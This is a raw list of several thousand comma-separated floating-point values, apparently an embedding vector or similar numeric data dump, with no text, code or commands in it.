0.011766863,0.0028178142,-0.0026172732,-0.009686057,0.011865158,-0.007493378,-0.002943919,0.011121265,-0.008163491,-0.021954197,0.00394762,0.008830201,-0.004588976,-0.0065240944,-0.0014374683,0.012662733,-0.010427662,0.012818844,-0.0077257724,-0.002285919,-0.0029664456,-0.021119433,0.015692705,0.040999763,0.002855751,0.00747574,-0.014623774,-0.02468854,-0.00952486,0.0053109326,-0.010680271,-0.013304074,-0.016927704,0.04996151,0.0029361292,0.027269771,-0.0015388326,-0.02093301,0.011351971,-0.013919693,0.028005302,-0.033983417,-0.008455219,0.012010348,-0.022627901,0.0014606284,0.039907325,0.015166514,-0.01059292,0.001236652,-0.005201348,-0.012983852,0.0013011366,-0.02267436,-0.011769793,0.012990021,0.000735925,-0.026529329,-0.013009682,-0.018384246,-0.05310806,-0.014945942,0.030894842,-0.00016963686,0.016802695,0.025395418,-0.006947633,0.0039569843,-0.034198575,0.011410684,-0.03306756,0.021447241,0.011767088,-0.005779362,0.010765834,-0.002221676,-0.023436334,-0.0020456912,-0.020513026,0.004251176,0.005114305,0.0041188,-0.0035238208,0.0008892247,0.004498532,-0.012461699,0.034823097,-0.0071594254,-0.007888624,-0.0035742985,0.028662313,0.016517963,-0.0034589902,-0.018376859,0.009403279,-0.011314081,0.024968134,-0.029845454,0.017375601,0.021745106,0.023084197,0.01360354,0.0056041772,0.018345833,-0.01900091,-0.009484485,0.02712833,0.021243535,-0.005926866,-0.0061581912,-0.0040327813,0.02461073,0.0037305458,-0.009111137,-0.011206583,0.022931619,0.016272528,0.004179699,0.009817297,0.008599752,0.012692397,-0.002457427,-0.023551134,-0.008011305,0.009819228,0.0125763705,-0.012462116,0.015099802,-0.0048706024,-0.0032715464,-0.0097963,-0.0008125384,-0.0044532814,-0.000103201935,-0.0248458,-0.007818272,-0.010028229,0.0072114635,-0.044036206,-0.0018716045,0.027222572,0.011547928,0.025090989,-0.018413028,0.0052462737,0.0020186685,-0.009057721,-0.023982426,-0.042099167,0.0049824724,0.026423473,-0.037444457,-0.0141370995,0.012503271,0.0010745887,-0.0035829525,0.009218108,-0.015158903,-0.012630413,-0.0037122448,-0.0057811537,-0.00087515713,0.002559613,0.02095521,0.008560925,-0.0015632932,-0.0040518343,-0.013751726,-0.0064728167,0.0026028906,-0.011541553,0.027928093,-0.0035734063,-0.0040712133,-0.009225086,-0.011496376,-0.023021001,0.0045600184,-0.043988608,-0.021609046,-0.026687283,0.018874444,-0.01140824,0.02485306,-0.026220815,0.031530894,0.016345186,-0.007603531,0.014811025,-0.023224179,0.00012461233,0.018116076,0.024186274,-0.009550531,-0.039357908,0.0023389764,0.035585567,-0.008799008,0.011706176,0.0032764056,-0.026696593,-0.034413233,-0.027558494,0.011966586,-0.009199677,-0.0039809598,-0.010381527,-0.04613631,0.03602764,-0.012714412,0.019717963,0.009949707,0.0037217333,0.00454362,-0.010617246,-0.007507061,-0.03156329,-0.022144571,0.0114150485,-0.029474018,-0.004300966,0.025372678,-0.030830622,-0.018319957,-0.01784637,0.00025195582,-0.005233401,0.021296876,0.0073915166,-0.00408717,-0.015126726,0.028243585,0.008451265,0.0072510284,-0.020279597,-0.023225691,0.010117476,0.004651843,0.010561786,0.026901707,-0.0042180205,0.02520096,0.017292783,-0.008236501,0.01002761,-0.011321702,0.0112429755,-0.020604415,0.01415436,0.009458322,0.0037814295,0.039733794,-0.021255529,0.002991703,0.017805075,-0.0042605656,-0.0050713145,-0.011565271,-0.023960805,-0.012552639,-0.0077466373,0.005592818,-0.016429689,-0.005617227,0.0070464374,-0.02333262,0.014934026,-0.009423898,0.013247191,0.009138472,0.009839603,-0.0028209502,0.015012495,-0.028338788,0.0043229577,0.0015915304,-0.011936687,-0.004640696,0.008239107,-0.013148657,0.02523752,0.02570967,0.0030035977,0.009957963,0.02151496,-0.018174676,0.0049693226,0.0006502573,0.0021503114,-0.0044378857,0.0063955486,0.028340504,-0.017870668,0.011784119,0.0033951488,-0.0038412819,0.0073716086,-0.023674456,-0.002855191,-0.01142849,0.00035491807,0.0150887305,-0.014694389,-0.015528288,-0.01626081,0.00830181,-0.012063335,0.013413442,0.007530563,0.010224912,0.0050044,0.01138947,0.006206024,-0.0056761038,0.01683096,-0.020583957,0.011589067,0.0071738446,-0.012231091,-0.0025265669,0.010738337,0.0030419698,0.0061679506,0.03576471,0.00783817,-0.00063364796,-0.02715907,-0.0144353835,0.005158772,-0.0037710606,-0.009459508,-0.024590798,0.04841853,0.0137820495,-0.0022800567,-0.02827946,-0.004654723,-0.047306243,0.03596221,-0.026316348,-0.0027840575,-0.0070006526,-0.014680573,-0.010847292,-0.0055448315,0.020529373,-0.017760394,0.027388634,0.0029058561,0.007920107,0.006896646,0.019876549,-0.006551281,-0.0133865755,-0.002296996,0.030163093,-0.0024398149,-0.015753077,0.0048346915,0.00009234728,-0.0015010521,0.027134549,0.017630065,-0.006351847,-0.014431003,-0.03640728,0.0013972697,-0.012652406,0.024748765,-0.014288215,-0.016463513,-0.010498883,0.0015103443,0.0110634575,0.016973194,-0.010515094,-0.012426815,-0.012613631,0.010110353,-0.0053659836,0.027225638,-0.027079305,-0.03230866,0.019577377,-0.010268832,-0.0083308555,-0.024922501,0.019040119,-0.00048559371,0.012238765,0.019025961,0.0023855108,0.039133556,-0.010836163,0.01844531,0.024133962,0.018288998,0.01787547,-0.016639924,0.0018076653,0.020127121,-0.019719426,0.013134295,0.010168539,0.016103312,0.0068676155,-0.017760342,0.0029692755,-0.019559579,-0.014597043,-0.012153948,-0.016627235,0.002795751,-0.022747517,-0.007426494,-0.0021332032,-0.0076302686,-0.010815623,0.017784355,-0.041126255,0.0059109246,-0.021374853,-0.025167143,-0.011531409,0.0070793633,0.00064022397,-0.0020523472,-0.005097664,-0.006546007,-0.018600188,0.017418575,0.026533566,0.03210856,-0.0014260696,-0.003813465,0.00433686,-0.0031549714,0.030349987,-0.007483061,-0.017183764,0.07313931,0.003511042,0.0003017769,-0.0054512527,0.005622617,-0.001495251,0.03208059,-0.0045871604,0.0116843665,-0.016458549,0.014633564,0.02233579,-0.0068956134,-0.0040684175,0.01924608,0.01108789,0.020201866,0.010855949,0.0015357459,0.022400765,0.014433629,-0.0010354056,0.034235887,0.032654107,0.008222125,-0.022386901,0.0069008297,-0.0034000115,0.014709548,0.009274248,0.0033554358,0.01830176,0.012339818,0.0042351936,-0.02689547,-0.011192897,0.016685078,-0.019802187,0.006195943,-0.017879866,0.0049283695,-0.002733167,-0.023837857,0.010457808,0.0065021333,0.0106572285,-0.0134672,-0.001398206,-0.01868416,0.015153324,0.00088829076,0.011623961,-0.00037743204,-0.008561715,-0.023327462,0.008387703,0.013002602,0.0011805954,-0.026161721,0.0041489545,-0.0002441406,-0.017411,0.016237132,-0.0029398492,0.009519779,-0.02086709,-0.012772824,0.018040456,0.0107104955,-0.014088578,0.019120276,-0.013517161,-0.026759064,0.01617247,0.0057061715,-0.015112462,0.022483926,0.0037947143,0.02822793,0.012479267,-0.01849172,0.013510353,-0.013914614,0.0027768097,-0.0042524426,-0.024652194,0.001764316,-0.0075422544,-0.002075988,0.025638465,0.007925085,-0.015636472,0.03435503,0.003596724,0.010475555,-0.0049093934,-0.0065905247,0.011117769,0.011812666,0.016119257,0.0071005444,-0.028324947,0.01366655,-0.0035505586,-0.040606942,-0.0030057798,-0.011764069,-0.0022940126,-0.0075148735,-0.0027802917,-0.023776602,-0.029331004,-0.011123762,-0.016220136,-0.0022038876,0.024944061,-0.019091068,-0.011573695,0.0012214757,0.01032628,-0.008168568,-0.01803926,-0.016452653,0.036176875,0.01948736,-0.004586254,0.011461316,0.030597962,-0.0049010487,0.021544177,0.021583462,-0.009425709,0.0066160862,0.0037268344,0.0030775429,-0.014548538,-0.014991011,0.007739507,0.005535705,0.02278674,-0.01282508,-0.009282942,0.014780062,0.0035987825,-0.004559572,0.0054068854,0.0009589917,-0.0070686247,0.010358287,0.0067389156,0.010909954,-0.031013984,-0.00083798054,-0.013494936,-0.007536407,-0.00410971,-0.027561706,-0.009138862,-0.0052152085,0.0009829646,-0.014501202,-0.012456737,-0.0018709551,0.009401228,0.0074694455,0.0013136544,-0.0012713452,0.013307796,0.0039906013,-0.017553383,0.0047064344,-0.0047288802,0.014559764,-0.020185767,-0.011480577,0.014461143,0.027772171,0.0056381337,0.020149129,-0.0005061059,-0.036489658,0.02092088,0.017796824,-0.0013731668,-0.014105999,0.023992738,-0.008855305,-0.01636259,-0.007357604,-0.004901918,0.0030371645,-0.0101418365,-0.014361294,-0.014754556,0.0054427558,-0.0055689653,-0.022666961,0.068019085,-0.013082043,-0.01368905,-0.0010978671,0.012928842,-0.0149277225,0.0076225055,0.009505273,-0.01293827,-0.016334243,-0.014774259,-0.022323051,-0.022101259,-0.02343487,0.0030855078,-0.019594694,-0.008714118,-0.011265897,-0.0007830899,0.007781221,0.006997293,-0.0058933552,-0.006870301,0.008882955,-0.0009403458,0.0007945308,0.0123854065,-0.0120471995,0.015634336,-0.020997686,-0.000016306427,-0.006843953,0.031866707,0.018817982,-0.013494818,0.0073513007,0.005319353,0.02022767,-0.0058548925,0.016490322,0.0008186657,-0.019934632,0.044464555,0.0013306647,0.009819247,0.003689368,-0.02705292,-0.00012122431,0.0028594634,-0.02767606,-0.003691383,0.0044270274,-0.018890014,0.011177712,-0.011276782,0.0013512254,-0.00013897537,0.033299744,0.02167884,-0.011759656,-0.006365369,-0.003545941,0.008130078,-0.012303665,-0.0032300083,-0.0016381536,0.011806557,-0.022228522,0.01747728,-0.019180862,0.0027963833,-0.0065164147,0.00026845207,0.008278023,0.0017238882,0.0069146235,0.0057068807,-0.001314434,0.005729956,0.0033779214,-0.009706536,0.0016707843,0.017886681,0.0035125362,-0.023235448,0.022159686,0.030479142,-0.010121007,0.07323507,0.0054365676,0.008272707,-0.0050821146,-0.0062477845,0.017003514,0.019404236,0.00991133,0.00015303277,-0.017313419,-0.018521858,0.008456938,-0.015502831,0.0070761046,0.015750133,-0.0059378594,0.011036943,-0.003269043,0.0020467502,-0.021981072,-0.0056260633,0.0057659596,0.009688691,0.010795528,-0.030024702,0.025425695,-0.009125373,0.005454192,0.014772945,-0.0045565288,-0.0101231225,0.00981739,0.0064361864,0.02006777,-0.006254315,-0.04178757,0.0123948995,0.13451248,-0.006874884,-0.0065486785,0.041678518,0.0051630405,0.018128881,-0.0738593,0.010868162,-0.012127736,-0.0027232764,-0.0037193117,-0.0048446115,-0.01842583,0.030829826,0.0038374313,-0.0027377815,-0.013568043,-0.021229772,0.037695825,-0.01398602,0.0044393484,0.013802523,-0.023811948,-0.009870227,-0.040190242,-0.010258418,0.012495666,-0.0058669974,0.0027477236,-0.030483322,-0.02048172,-0.017923236,0.0068012467,-0.00079512846,-0.0021859882,0.016478566,0.0034070762,0.012032131,-0.0027161352,0.0150105525,0.016409386,0.007216562,-0.0038472998,-0.030443296,-0.14069544,0.013484227,-0.008936808,-0.050282486,0.0075418428,-0.0145663675,0.015516547,0.015145909,0.018824121,0.015579924,0.00089664926,0.020361701,-0.006071155,-0.011392457,-0.0067443415,0.0066192225,0.027456742,-0.0021386482,-0.0036246981,-0.0060071675,0.004717615,-0.006505715,0.00049921323,-0.027707892,-0.014316038,0.012497095,0.0055059567,0.019434966,0.0021939832,0.00813793,-0.006470696,0.02404483,-0.04063243,0.009287195,0.011826809,-0.033166148,-0.026602445,0.014593214,-0.009787753,0.031962346,-0.014186188,0.0023004059,0.008142811,0.0014323022,-0.0035102316,0.012281237,0.008150471,0.01885613,0.028394388,-0.016107216,0.015402902,-0.0010627111,-0.0239257,0.003398573,-0.008459066,-0.009100547,-0.004540406,-0.009971985,-0.020351289,0.0015913254,-0.0077656987,-0.020886699,-0.011684548,-0.007863604,0.028753147,-0.014515791,0.031257484,-0.014255039,-0.01498689,0.015480163,-0.0081635425,0.0068467846,0.020153714,-0.009051416,0.0017860461,0.026400162,-0.011369185,0.01281976,0.006231327,0.006548079,0.020345312,0.0029005983,-0.007915249,-0.0130040515,0.016463002,-0.0040498464,0.0024941524,-0.00040121336,-0.011101194,-0.0067208954,0.013610435,-0.015075678,0.026559576,0.009488241,0.012778239,-0.005668454,0.04670475,-0.004721172,-0.01278209,0.021046428,0.0026374508,-0.022128837,-0.00044419625,0.012313026,-0.0151553,-0.0027610264,-0.008127873,-0.017203743,-0.016976723,-0.01067733,-0.011118155,0.0002535366,0.02349554,-0.00024688808,-0.017633665,-0.035163656,0.011273495,0.017407343,0.0031050763,-0.023235364,-0.01311654,0.0055715167,-0.014787664,0.037230246,0.030558055,0.023336956,-0.008678396,-0.012269087,-0.023618791,-0.0058510615,-0.030608492,0.034097232,-0.0038173143,0.038305353,-0.023796836,-0.0070494665,-0.01132424,-0.009030489,-0.054564714,-0.02635819,0.00455283,0.004329532,0.0022026016,0.01067395,0.005006389,-0.024843384,0.008552863,-0.010977035,0.008610014,0.0029500548,0.013861697,0.014333341,-0.008983134,-0.028470306,-0.00203324,0.06818865,0.004807803,-0.011581308,0.02199918,-0.004477333,0.011028906,0.022317477,-0.02536902,0.00016080936,0.0037317513,-0.012898241,0.00016026082,-0.009942068,0.02326595,-0.03140129,0.03866438,0.008557248,0.016497606,-0.009769078,-0.008238815,0.019271951,-0.012917621,-0.010474327,0.007305826,0.008821492,-0.0053883763,0.018405255,0.0036889117,-0.0025308249,-0.00030807417,-0.00031661484,-0.01642515,0.0021779926,-0.0040684743,0.0027895055,-0.03337706,-0.01643822,0.016165202,-0.020603701,0.0010692232,0.0021919173,0.008011871,-0.00057275005,-0.023896813,0.0011113745,-0.010586258,-0.012119142,-0.0036882597,0.013642606,-0.019492261,0.018012904,0.013055149,-0.0006564142,-0.0012081547,-0.0012655971,-0.003076163,-0.020315444,-0.006689722,0.0119504025,0.0017732721,0.028540384,-0.009630568,-0.025539866,-0.018584663,-0.0019732998,-0.00575141,-0.004630502,-0.008212055,0.011717869,0.02568855,-0.012785566,-0.013918304,-0.013329246,0.01554963,-0.0069727344,-0.006770879,-0.022541223,0.0043698233,-0.0029500443,0.023859687,0.009021326,0.011299354,-0.0012478188,-0.006310437,-0.0158791,-0.060098574,-0.022102667,0.04387087,-0.0044724485,-0.0017848262,0.013190008,0.017901475,0.012217483,0.0026406017,0.0058578807,-0.00072618737,0.019952398,0.005096456,0.007849271,-0.003782412,-0.0063743084,0.011062024,0.0008333455,-0.027178818,0.023946632,-0.010698745,-0.008407083,0.00037945982,0.025626583,-0.0071580787,0.021323062,-0.015151622,0.0148226665,-0.026316447,-0.0050188876,0.015273313,-0.02059015,0.019156557,0.012924948,0.0012049945,0.010054839,-0.008172003,-0.008448558,-0.00778952,-0.0011988289,-0.003729523,0.010443032,0.0050969548,-0.03467848,0.021194369,0.009330996,0.018550279,-0.0081682,-0.0062674335,-0.023616431,0.017483741,-0.0049775224,-0.0014970549,0.0015450033,0.038483594,-0.018063841,-0.010578153,-0.00921889,0.014060012,-0.020459468,0.011549142,0.0027219667,-0.008420236,-0.01036533,0.0026939972,-0.011764139,-0.011226154,-0.0056417426,-0.009456987,0.0033163726,-0.0032264728,-0.018385487,0.0009772927,-0.023777299,0.0037582405,0.008800887,0.008920501,0.008543918,-0.0032327115,-0.016921569,0.021609679,0.028882144,-0.0149599435,0.025092626,0.0007124812,0.010032882,-0.019460851,-0.0013577244,-0.01566116,0.025953045,-0.004936694,0.013080572,0.021390244,0.0054650265,-0.010523346,0.030763071,0.009030566,-0.004662421,-0.009374356,-0.013144607,0.009249803,-0.018498557,0.025125545,-0.034430284,-0.010213983,-0.013006445,-0.004870505,-0.010138457,0.005198568,-0.009334156,-0.006336418,0.014570947,-0.008026365,-0.0074781473,0.018970925,-0.0012346361,0.008664495,-0.006490409,-0.017914023,0.011349314,0.0127460435,-0.00888402,-0.00984212,0.0042870077,-0.0044427463,0.0070858044,0.007589755,-0.0031883207,0.023869237,-0.0011917142,-0.016617276,-0.018635927,0.017542558,-0.00174003,-0.025439082,0.02889717,-0.006897292,0.015931262,0.010814593,-0.005659881,-0.015319464,-0.023145378,0.07747908,-0.013284877,0.004491206,0.017243596,0.019155113,0.02324033,-0.0113862455,-0.011041684,-0.02307997,-0.0145053435,-0.020671057,-0.041415304,-0.017969558,0.0108997775,-0.031963397,-0.011612878,-0.017870499,-0.012120684,-0.01075906,0.004260039,0.0032311403,-0.0052851513,0.012221052,-0.0026942962,-0.0056478144,-0.05886191,-0.0151976505,0.01912781,-0.023137646,-0.015781557,0.011797951,-0.003677932,-0.017202014,-0.008244033,-0.014413842,-0.016155489,-0.027637945,0.0041183997,0.008592027,0.022079425,0.017122205,0.004638546,0.0009268158,-0.006789574,0.0031095666,-0.0037594805,0.014424935,-0.005053301,-0.005976303,-0.004561242,-0.015237962,0.003721532,0.035203602,-0.0050813914,-0.021503577,0.01863636,0.00087216287,-0.002155937,0.0027561598,0.0056445096,0.0019572761,-0.020995129,-0.015889743,0.00848249,0.015424776,0.027984943,0.007165477,-0.014679048,-0.0006321635,0.00010226353,-0.027884558,0.0056006564,0.0014448212,0.024088858,-0.009980623,-0.002775538,0.021589179,-0.017294079,0.016127894,0.019698348,-0.0013861145,0.006080006,-0.0008581886,-0.022937331,-0.0024422365,0.0025477123,-0.009677774,0.03082112,0.010720364,0.018446207,0.05254859,-0.028141785,0.0036658584,-0.012526374,-0.013896837,-0.0035087743,-0.0017307646,-0.0324622,0.0060236906,-0.008275875,-0.015663994,0.010721959,-0.001669389,-0.013745834,-0.017842485,0.018169343,-0.07369634,0.0076992763,-0.026945144,-0.031023916,0.001188496,-0.013894224,0.011507771,0.02800379,0.005769039,-0.06364952,-0.018570237,0.009846461,-0.006362077,-0.017207174,0.0011243769,0.01691235,-0.016991865,0.006046318,-0.0010913152,0.012722536,0.014373185,-0.013537035,0.021942444,0.0007102634,0.015290099,0.006044043,-0.007050995,0.018312726,0.027202722,0.0041256184,0.0048083854,0.009065869,0.014141233,0.012024405,0.0007434658,0.0060114595,-0.028305331,-0.0110898195,-0.0102154855,0.013453076,-0.0071127503,0.0055821743,-0.017384809,-0.010168968,0.016587386,0.003555708,0.0005304159,0.028408881,0.01500494,0.017049616,-0.028560163,-0.038061664,0.009747924,-0.009830304,-0.01157703,-0.015717277,0.0023854354,-0.006506203,0.012428134,-0.0054110764,-0.017332667,-0.020536635,0.0012579411,-0.016823484,-0.0024471742,0.0031857896,0.005434606,-0.015800169,-0.023265693,0.00057349383,-0.0011480357,0.00917443,0.0012358894,0.0000760294,-0.0007135975,0.022727309,0.021531375,0.0141264815,-0.021138234,0.018720562,-0.03819573,0.018734364,0.014161403,0.018688615,-0.011347162,-0.015029753,0.027879898,0.009715017,-0.023141468,-0.0010320542,0.014232462,0.015118851,-0.0066666175,-0.0073565855,-0.020362195,0.0029494548,-0.0024899668,0.03404155,0.0058851764,0.015429638,-0.0015960763,0.003931609,0.010697018,-0.018475128,-0.10756259,-0.00018206133,0.014126816,-0.0021362428,-0.01936042,-0.020735143,0.014495919,0.0044435696,0.0513762,0.0071091675,-0.010749861,-0.0011439694,-0.005880993,-0.0075289183,-0.0026818116,0.0066860523,-0.014187603,-0.01850029,-0.0021514583,-0.008064347,0.0037184476,-0.035858,-0.0060382066,0.013165519,0.008069243,0.007990405,0.007380111,0.018490482,0.016968984,0.006363276,0.0007254024,-0.005414789,-0.017417803,0.0104266815,-0.05273866,-0.0042827977,-0.02214823,-0.0066957655,0.012289851,0.021557216,0.00403119,-0.011057424,0.013554827,0.002716649,-0.0060058516,-0.009924335,-0.0052381316,0.01777435,-0.008958757,-0.009403229,-0.005717698,0.00037438038,-0.004672061,-0.0007882944,0.0020694647,-0.016502025,-0.0079201115,0.027161853,-0.0060202098,0.010154464,-0.022368293,0.0094401715,-0.009586285,0.01874397,-0.001635725,0.038360126,-0.008601576,0.020420276,-0.0015110234,0.003391378,-0.015954513,0.014993561,0.0054520406,-0.013234163,0.02604775,-0.00068566395,0.011043825,0.026530989,0.01869205,0.007510082,0.00372944,-0.023575498,-0.02067109,-0.005167359,-0.04426032,-0.0021326023,0.0061357534,0.018569823,-0.0062705525,0.015736122,0.009593136,0.00562433,-0.0061234273,0.019212306,0.004300554,0.0011800906,0.04680788,-0.010500272,0.0067053363,-0.0071015246,-0.0073909746,-0.0089703435,-0.0072616134,0.03103562,-0.008135543,0.013516102,0.016086496,-0.02453638,-0.0013237074,-0.003848227,0.016887639,0.017435193,-0.022027664,-0.00418001,0.007761636,0.024242863,-0.014376756,-0.011107863,0.018512357,-0.0036395746,0.002543329,0.002155596,-0.0021435681,-0.022647107,-0.017446538,-0.013443992,-0.026445638,0.018930493,-0.0046898574,-0.02475465,-0.00723027,0.005496481,0.016899122,-0.024353374,-0.006367189,0.0032985513,-0.026740586,-0.0030244433,-0.007672737,-0.0096153775,0.030865656,0.011057736,-0.02101299,-0.018455582,0.01855637,-0.02047373,0.0024429422,-0.0009975634,-0.011327307,0.010048814,0.0068510347,-0.0038818063,0.014753304,0.0045002606,-0.004649953,-0.005034827,-0.018677657,-0.0048861466,-0.01131671,0.01342459,-0.0029810916,0.026918158,0.038497895,-0.014018446,0.017593523,0.0035857365,-0.014473849,-0.0028794745,-0.01604196,-0.00138391,-0.013001403,0.005513433,-0.0014940324,-0.058082074,-0.005985892,0.010321599,0.022506457,0.019042077,0.051600844,0.024411546,-0.02682236,0.008494911,0.0017878524,-0.0004436858,0.0040133083,0.017698655,-0.015848512,-0.016349401,0.0009271832,-0.011774602,0.025680576,-0.011498985,0.0021355534,-0.0045502046,0.003741578,0.0030483063,0.0014538157,-0.0019329165,0.0100459615,0.0025182345,-0.017605646,0.015014099,0.0011211735,-0.019080954,0.021835864,0.009131601,-0.00079965516,0.06732334,0.009772056,-0.014502303,-0.026270788,0.0143033,-0.011797198,0.011634309,0.0039147884,0.007972844,-0.008191222,-0.017816601,0.0013477888,0.005205725,-0.0048888265,-0.014999736,0.004444169,0.004690211,-0.0022378087,0.03239172,0.0364856,0.00048304742,-0.037407458,-0.008599664,0.012127828,0.014545204,-0.022333318,0.013733248,-0.020893797,-0.0052055004,0.018052476,-0.010144272,0.017778642,0.0048731426,0.0052083246,0.0016552203,0.04301544,0.01827789,0.036356177,-0.011872704,-0.006369569,0.018801393,0.010286556,0.023251098,-0.00019174421,-0.0049789962,-0.011789162,-0.0071818107,0.020513982,0.0068787574,0.010213725,0.012830422,-0.007192182,-0.004713478,-0.011708369,-0.005895976,-0.031612936,0.021664437,0.0039973673,0.006951583,-0.018041236,-0.010933909,-0.013363655,-0.02155105,0.023948988,0.027217338,0.00061314326,0.00959832,-0.0120820515,-0.009850107,0.0027701156,0.005185641,0.015773775,0.0096134795,0.004686198,-0.0012279594,-0.017789057,-0.00013305225,-0.009007212,0.021526663,0.017811289,0.004253643,-0.0077398624,0.005544847,-0.0053412435,-0.015076124,-0.002193939,-0.008534079,0.0006620422,0.017010927,0.010993846,0.008469166,-0.00047423906,0.010226501,0.010189629,-0.0161443,-0.015557912,0.0019020535,0.0053600175,-0.009894227,-0.01191656,0.020904696,0.0046679233,-0.012832838,-0.0031881756,0.005888386,-0.02740187,0.045278843,0.0051230984,0.018326413,-0.0065113185,0.0018237632,-0.026398111,-0.006521433,0.0019030164,0.016420864,0.019281665,-0.020771943,-0.0027350886,-0.021120101,0.0066488,0.027424159,-0.028021667,-0.018197281,0.03115273,-0.0027214687,0.001039899,-0.020635152,0.018981911,-0.007883037,0.009245711,0.034146205,0.0063851224,0.013682532,-0.0011074205,0.018764453,-0.0043075765,-0.0076597184,0.0015186529,0.01003445,0.0055446,-0.004689639,0.0045900596,0.013787805,-0.000009038704,0.0023062474,-0.0037599066,0.005082101,-0.009082289,0.03871512,-0.02930652,0.0029274481,-0.0009788545,-0.0007871035,-0.016993852,0.03458928,-0.010758994,-0.017567866,0.0018236168,0.00008407193,-0.018865304,0.003713484,-0.028325563,-0.004612391,-0.015638828,0.017809592,-0.01711911,-0.028737478,-0.029864645,-0.09805322,-0.013062842,0.01249278,-0.010586474,0.029839694,0.0028828376,-0.002255641,0.012946184,0.009753411,0.0066453326,-0.0018689081,-0.002158559,0.0075934,0.0066252397,0.028786369,-0.017103536,-0.01694609,0.0009346545,0.00045163397,-0.019689767,0.013087986,0.00748689,-0.0017712621,0.0012834211,0.011681882,0.019039357,-0.0031813488,-0.027292587,0.01567137,0.0019436427,0.0070285955,0.0099363895,-0.022598734,-0.015928958,-0.02890472,-0.0052570933,0.014156442,0.017720733,0.0003690481,0.0034352392,0.004725957,0.000426738,-0.0036123812,0.012750436,-0.029038642,0.003564894,-0.030870397,-0.0035369354,-0.009263881,-0.027384734,0.00575854,0.009547519,0.008229304,0.01924665,-0.0026727454,0.008345623,0.027451426,-0.016648894,0.04255686,-0.000716012,-0.01816778,-0.004960305,0.009950606,-0.01635137,-0.0047248574,-0.011682119,-0.001138275,0.024714636,-0.013317814,0.012111809,0.02521423,-0.023295611,-0.0012305297,-0.015024292,-0.006989314,0.01693715,-0.00023762105,-0.0130940275,-0.004000692,-0.004360749,0.048840165,-0.0018841012,0.015862186,0.00412749,-0.007985398,0.0046479586,-0.0076586967,-0.014513215,0.022141809,-0.007005801,-0.01732427,-0.013676379,0.014018628,-0.01210144,0.019365583,-0.0028890152,-0.022699708,0.011986848,-0.008738717,0.0011469421,-0.03348442,-0.020373119,0.0002909082,-0.013362938,0.011468978,-0.008721637,-0.014645617,-0.0047064642,-0.023933562,0.0006947978,-0.010203734,0.034902196,0.053299874,0.0119544,0.022476323,0.009879465,-0.010438205,-0.0015387991,-0.0071281525,-0.022846205,-0.0012584203,-0.0011596209,-0.0211833,0.02160792,0.0071404907,0.00077773415,0.006872436,-0.003975319,-0.009672978,0.010135282,-0.00015209921,0.028992547,0.007563961,0.022385906,-0.016911516,0.0034569078,-0.025002686,0.016090482,0.0030018433,0.036039438,-0.0087004565,-0.018794209,0.0009257362,-0.0014291374,-0.023615869,0.015386529,0.015269122,-0.018262697,-0.006630593,-0.0073200003,-0.0051911892,-0.00298586,0.010655884,-0.0016223452,0.014263397,0.00036669077,0.017206784,0.018360479,-0.021495022,-0.013139746,0.0030341607,0.021730203,0.019584818,-0.012343484,-0.022938943,-0.0016341114,-0.012162421,0.01072818,0.0021123302,0.0011905284,-0.021813719,0.02397235,0.0059836144,0.0014752863,-0.035072427,0.0061959387,0.01123227,0.040344417,-0.0043176687,-0.030212926,-0.033404432,0.012491453,0.001931224,-0.023136346,-0.008061866,-0.010082845,-0.00047522946,-0.012347322,0.012374958,-0.0023909311,0.0058739334,-0.0021721588,-0.00866618,-0.0032625715,-0.0020983825,-0.009181376,-0.001435653,-0.009471371,0.0034266983,0.0110388715,0.0061942707,0.019415868,-0.0033083751,0.025411256,0.03136909,0.011967765,-0.027930427,0.0069029215,-0.018729934,-0.016052898,-0.009426335,0.019153427,0.021325242,0.11919399,0.029716456,-0.011938667,-0.0126172835,0.010836725,0.014653263,0.032917727,-0.028259188,0.0046101026,0.0038545073,0.021069728,0.00041211006,-0.002703372,0.0045228708,-0.010187459,0.02975622,0.010075609,-0.0074184565,0.014100073,-0.00045513647,0.0122764185,-0.011780887,-0.010644435,-0.052494835,-0.010370608,-0.041897066,0.023346962,0.017058926,-0.0151829785,0.011818234,0.0017851421,-0.0052267066,0.02711313,0.0011634997,-0.029641692,0.018796002,0.0028041017,-0.01073896,-0.008203544,-0.02551436,0.011911156,0.010884893,-0.00335142,0.004562265,-0.015539017,-0.02054991,-0.0036901536,-0.0057373387,0.010567523,0.008870373,-0.01139536,0.007465913,0.029082598,-0.009803602,0.0059836507,0.0013960951,-0.010553719,0.0011084887,0.0060923677,-0.0012230144,0.0076002786,0.026664065,0.0057096104,0.00054904795,0.014828945,0.013028044,-0.010000418,-0.009217344,-0.026530137,-0.009192319,0.017379606,-0.005106543,0.02298989,-0.0054276013,0.0013030065,0.00445497,-0.0060175955,-0.014203122,0.0045024087,-0.012200863,0.010131887,0.006763567,-0.0039956793,0.018463474,0.0037084392,0.0034242219,-0.00905327,0.022652289,-0.009918996,-0.008010881,-0.0008853592,0.0012144702,0.01549829,0.028721955,0.0001225173,0.006533094,0.00948143,-0.019941732,-0.013866903,0.004239086,-0.02032402,-0.008621017,0.0018749197,-0.0024782084,-0.010524699,-0.01164866,-0.012935116,0.035420123,-0.012028448,0.005950783,-0.01774369,0.0044635287,-0.014133261,0.01788782,-0.0014232494,0.017161366,-0.031231642,-0.0070976615,0.01386658,-0.018283457,-0.005147651,-0.007080611,0.013448271,0.024644012,0.02246178,0.0039406456,-0.014999722,0.008606949,-0.0034574517,0.013953545,0.024482416,-0.042879872,-0.014903495,0.019335719,-0.0075571113,-0.0026652534,0.029554987,-0.012080356,0.019010989,-0.0017198542,0.024511632,-0.0019003227,0.0009226372,0.0017804913,0.0035124146,-0.02275066,0.022592572,0.018086206,0.014075908,-0.007572086,0.0047245747,0.0071050343,-0.015129257,-0.011529361,-0.009659302,0.0006255747,-0.005873395,0.013639901,-0.008211897,-0.012854784,0.026447402,-0.0051798164,-0.0032428284,-0.040401205,0.01550351,0.019013437,0.036141697,0.0010262417,0.019967154,-0.0050525027,-0.0045168195,0.010006167,-0.009168312,0.0029345038,0.0014199127,-0.0018845355,0.0023920794,0.01333531,0.0012739735,0.0029865345,0.0027781227,0.024376579,-0.0049057524,0.0019933246,0.023031054,-0.0047825277,-0.0014652421,0.010180279,-0.0141481375,0.01679435,-0.007285264,-0.017317617,-0.007206531,0.024411522,-0.02394158,0.0068090926,-0.014344612,0.040658105,-0.008025581,-0.029496092,0.014926706,0.011760215,0.023968859,-0.005753887,0.00045392817,-0.009082749,-0.009273433,-0.016997455,-0.0027170142,-0.008014922,0.014092632,-0.014369451,0.005654124,-0.021538328,-0.011035408,0.0035098144,0.010649278,-0.015035267,0.0018232734,-